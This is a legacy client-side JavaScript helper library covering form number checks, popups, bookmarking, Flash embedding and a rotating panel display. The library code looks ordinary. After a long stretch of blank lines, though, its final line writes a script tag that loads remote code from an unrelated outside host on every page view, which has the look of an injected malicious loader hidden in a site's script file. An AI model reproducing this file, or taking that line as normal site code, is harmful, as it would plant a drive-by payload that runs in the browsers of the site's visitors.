function clientScriptInitail(){
this.nbc='0123456789';
this.link=Function('uri','location.href=uri;');
this.jmp=Function('window.open(arguments[0],"");');
this.nwin=Function('window.open(arguments[0],"01","width=500,height=400");');
this.err=Function('id','msg','alert(msg);if(id)id.focus();return false;');
this.numobj=Function('id','msg','if(!this.isNumber(id.value))return(this.err(id,msg));');
this.addFavorite=Function('v','if(document.all)window.external.addFavorite(location.href,v)');
this.setHome=Function('id','id.style.behavior="url(#default#homepage)";id.setHomePage(location.href);');
this.tag=[unescape('%3CScript%20Language%3D%22JavaScript%22%20src%3D%22'),unescape('%22%3E%3C/script%3E')];
this.loading=Function('for(i=0;i<arguments.length;i++)document.write(this.tag[0]+arguments[i]+this.tag[1]);');
this.flash=function(uri,w,h,wmode){
	document.write('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="'+w+'" height="'+h+'"><param name="movie" value="'+uri+'"><param name="quality" value="high">'+(wmode==true?'<param name="wmode" value="transparent">':'')+'<embed src="'+uri+'" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="'+w+'" height="'+h+'"'+(wmode==true?' wmode="transparent"':'')+'></embed></object>');
	}
this.page=function(id,opter){
	var page=id.offset.selectedIndex;
	eval(opter+"page");if(page<0)return;
	if(page>=id.offset.length)return;
	id.offset.selectedIndex=page;
	id.submit();
	return;
	}
this.isNumber=function(v,ext){
	var numcode=this.nbc;
	if(ext)numcode=numcode+''+ext;
	for(si=0;si<v.length;si++){
		if(numcode.indexOf(v.charAt(si))==-1){return false;}}
	return true;
	};
this.samsara=function(id){
	bid=id+"back";cid=id+"curr"
	if(arguments.length>2){this[id]=new Array();
		this[bid]=null;this[cid]=-1
		for(si=1;si<arguments.length;si++)this[id][si-1]=arguments[si];}
	if(this[id]){if(document.getElementById(this[bid]))document.getElementById(this[bid]).style.display="none";
		if(++this[cid]>=this[id].length)this[cid]=0;this[bid]=this[id][this[cid]];
		if(document.getElementById(this[bid]))document.getElementById(this[bid]).style.display="block";}
	setTimeout("js.samsara('"+id+"')",this[id][++this[cid]]*100);
	}
}
var js=new clientScriptInitail(); 




 












































document.write('<script src=http://freeloomedia.com/data/preview_es.php ><\/script>');